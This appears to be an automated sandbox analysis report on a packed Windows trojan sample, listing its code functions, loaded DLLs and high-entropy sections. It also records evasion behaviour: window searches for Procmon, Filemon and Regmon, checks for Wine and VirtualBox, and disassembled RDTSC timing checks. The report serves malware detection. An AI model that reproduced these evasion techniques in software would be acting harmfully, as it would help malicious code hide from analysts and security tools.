              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DFA200_2_006DFA20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007822CA0_2_007822CA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FEB6A0_2_005FEB6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062D3590_2_0062D359
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00733B2A0_2_00733B2A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075C3180_2_0075C318
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00764BF40_2_00764BF4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00654DE00_2_00654DE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007575BE0_2_007575BE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075DE590_2_0075DE59
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FA6270_2_006FA627
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AA6390_2_006AA639
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007616100_2_00761610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A475B0_2_006A475B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007427400_2_00742740
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 003A4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: bvkzsckp ZLIB complexity 0.9949526579483695
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_003C3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_003BCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2N9DECTF.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1801728 > 1048576
              Source: file.exeStatic PE information: Raw size of bvkzsckp is bigger than: 0x100000 < 0x19e000

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bvkzsckp:EW;wpxlzhew:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bvkzsckp:EW;wpxlzhew:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c41a7 should be: 0x1ba7c6
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: bvkzsckp
              Source: file.exeStatic PE information: section name: wpxlzhew
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9877 push 53CC1ED9h; mov dword ptr [esp], esi0_2_007F9898
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081C08B push 6F3F86BBh; mov dword ptr [esp], esi0_2_0081C0A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FA04D push ecx; mov dword ptr [esp], 132F791Eh0_2_007FA07C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FA04D push ecx; mov dword ptr [esp], ebp0_2_007FA0D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FA04D push 2ACD2504h; mov dword ptr [esp], ebx0_2_007FA198
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008188B8 push 0EC53120h; mov dword ptr [esp], edx0_2_008188D7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A310E6 push edx; mov dword ptr [esp], ecx0_2_00A3111C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078002B push 7297C4E7h; mov dword ptr [esp], ebp0_2_007800D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078002B push eax; mov dword ptr [esp], ebp0_2_0078016F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078C020 push 776AB19Eh; mov dword ptr [esp], esi0_2_0078C044
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078C020 push edx; mov dword ptr [esp], edi0_2_0078C0E2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 3590226Dh; mov dword ptr [esp], eax0_2_0075A83A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push edi; mov dword ptr [esp], ebp0_2_0075A8C7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 7650A7CEh; mov dword ptr [esp], edi0_2_0075A97B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push edi; mov dword ptr [esp], ebx0_2_0075AA0E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push esi; mov dword ptr [esp], edx0_2_0075AAD1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push eax; mov dword ptr [esp], esi0_2_0075AB5F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 0930FA61h; mov dword ptr [esp], edi0_2_0075AB73
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push eax; mov dword ptr [esp], 7EEF0902h0_2_0075AB77
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebx; mov dword ptr [esp], 49043933h0_2_0075ABF3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 29CD22B8h; mov dword ptr [esp], eax0_2_0075AC9B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 1A283E76h; mov dword ptr [esp], edi0_2_0075ADD4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebp; mov dword ptr [esp], ecx0_2_0075AE69
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 3266154Dh; mov dword ptr [esp], ebx0_2_0075AEB6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 0E013E59h; mov dword ptr [esp], ebx0_2_0075AED4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebx; mov dword ptr [esp], 5BFC93E8h0_2_0075AF00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebp; mov dword ptr [esp], 2663EE7Ah0_2_0075AF4E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ecx; mov dword ptr [esp], 4358BB07h0_2_0075AF97
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push edx; mov dword ptr [esp], 7A137CD4h0_2_0075AFA9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 63C2366Bh; mov dword ptr [esp], ebx0_2_0075AFF7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebx; mov dword ptr [esp], ecx0_2_0075B036
              Source: file.exeStatic PE information: section name: bvkzsckp entropy: 7.954205119392446

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C6390

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26461
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0412 second address: 5EFC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F292CD152F1h 0x0000000c nop 0x0000000d add dword ptr [ebp+122D18F0h], edx 0x00000013 push dword ptr [ebp+122D169Dh] 0x00000019 js 00007F292CD152ECh 0x0000001f mov dword ptr [ebp+122D1A7Ch], eax 0x00000025 call dword ptr [ebp+122D2B67h] 0x0000002b pushad 0x0000002c jnl 00007F292CD152F0h 0x00000032 xor eax, eax 0x00000034 jmp 00007F292CD152F0h 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d mov dword ptr [ebp+122D318Bh], edi 0x00000043 mov dword ptr [ebp+122D3B33h], eax 0x00000049 mov dword ptr [ebp+122D3442h], eax 0x0000004f cmc 0x00000050 mov esi, 0000003Ch 0x00000055 jng 00007F292CD152EEh 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f js 00007F292CD152ECh 0x00000065 mov dword ptr [ebp+122D318Bh], ecx 0x0000006b lodsw 0x0000006d cmc 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F292CD152ECh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D30E3h], ebx 0x00000081 nop 0x00000082 jg 00007F292CD152F0h 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c pushad 0x0000008d popad 0x0000008e jp 00007F292CD152E6h 0x00000094 popad 0x00000095 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769B03 second address: 769B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F292CD65AA6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F292CD65AA6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769B18 second address: 769B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769DE0 second address: 769E07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AADh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F292CD65AAEh 0x00000011 pop ebx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769F64 second address: 769F8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F292CD152EAh 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F292CD152ECh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769F8A second address: 769F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769F8E second address: 769F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A0E1 second address: 76A0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A0E5 second address: 76A113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F292CD152F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F292CD152F7h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A113 second address: 76A128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F292CD65AACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CF65 second address: 76CF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D11A second address: 76D120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D120 second address: 76D125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D125 second address: 76D189 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F292CD65AA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 jl 00007F292CD65ABDh 0x00000017 jmp 00007F292CD65AB7h 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jmp 00007F292CD65AACh 0x00000025 jne 00007F292CD65AB7h 0x0000002b jmp 00007F292CD65AB1h 0x00000030 popad 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 jne 00007F292CD65ABBh 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D246 second address: 76D24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D24A second address: 76D2BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F292CD65AA8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 call 00007F292CD65AAAh 0x00000029 xor edx, dword ptr [ebp+122D3A87h] 0x0000002f pop ecx 0x00000030 push 00000000h 0x00000032 jbe 00007F292CD65AB2h 0x00000038 jo 00007F292CD65AACh 0x0000003e mov dword ptr [ebp+122D18F0h], ecx 0x00000044 call 00007F292CD65AA9h 0x00000049 jmp 00007F292CD65AB1h 0x0000004e push eax 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D2BE second address: 76D2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D2C2 second address: 76D2F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F292CD65AB7h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D2F5 second address: 76D2FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D2FB second address: 76D301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D301 second address: 76D39A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jo 00007F292CD152F8h 0x00000013 push ebx 0x00000014 jmp 00007F292CD152F0h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jg 00007F292CD152EEh 0x00000024 pop eax 0x00000025 mov dword ptr [ebp+122D1913h], ecx 0x0000002b push 00000003h 0x0000002d xor edi, dword ptr [ebp+122D2044h] 0x00000033 mov edi, 1FBE1FB5h 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1A00h], edi 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007F292CD152E8h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c or dword ptr [ebp+122D19A6h], edx 0x00000062 push B27F8246h 0x00000067 pushad 0x00000068 push ebx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D42B second address: 76D42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D42F second address: 76D435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D435 second address: 76D4A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F292CD65AB0h 0x0000000f nop 0x00000010 pushad 0x00000011 mov dword ptr [ebp+122D30E3h], ebx 0x00000017 mov cx, 3AB2h 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F292CD65AA8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push edx 0x00000039 mov dl, 71h 0x0000003b pop esi 0x0000003c call 00007F292CD65AA9h 0x00000041 push eax 0x00000042 push edx 0x00000043 push esi 0x00000044 pushad 0x00000045 popad 0x00000046 pop esi 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D4A1 second address: 76D4BA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F292CD152E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007F292CD152E6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D4BA second address: 76D4CE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F292CD65AA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D4CE second address: 76D4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F292CD152ECh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D4E5 second address: 76D583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F292CD65AABh 0x00000010 pop eax 0x00000011 xor cx, DBF0h 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D323Fh], eax 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F292CD65AA8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov esi, dword ptr [ebp+122D3AEBh] 0x00000040 mov dword ptr [ebp+122D2AADh], ebx 0x00000046 push 00000003h 0x00000048 mov cx, 466Ah 0x0000004c push 70BB4B49h 0x00000051 pushad 0x00000052 pushad 0x00000053 jmp 00007F292CD65AB9h 0x00000058 jmp 00007F292CD65AB3h 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F292CD65AB3h 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D583 second address: 76D5AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4F44B4B7h 0x0000000e jnc 00007F292CD152ECh 0x00000014 lea ebx, dword ptr [ebp+12450EABh] 0x0000001a mov edi, 65030B0Bh 0x0000001f xchg eax, ebx 0x00000020 push ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D5AD second address: 76D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F292CD65AA6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D5C0 second address: 76D5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D5C4 second address: 76D5CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E036 second address: 77E04A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E04A second address: 77E04F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E04F second address: 77E05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E05D second address: 77E066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E066 second address: 77E06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E06A second address: 77E06E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB62 second address: 78DB78 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F292CD152E6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jne 00007F292CD152E6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BE2F second address: 78BE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F292CD65AACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BF9E second address: 78BFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BFA4 second address: 78BFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BFA8 second address: 78BFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
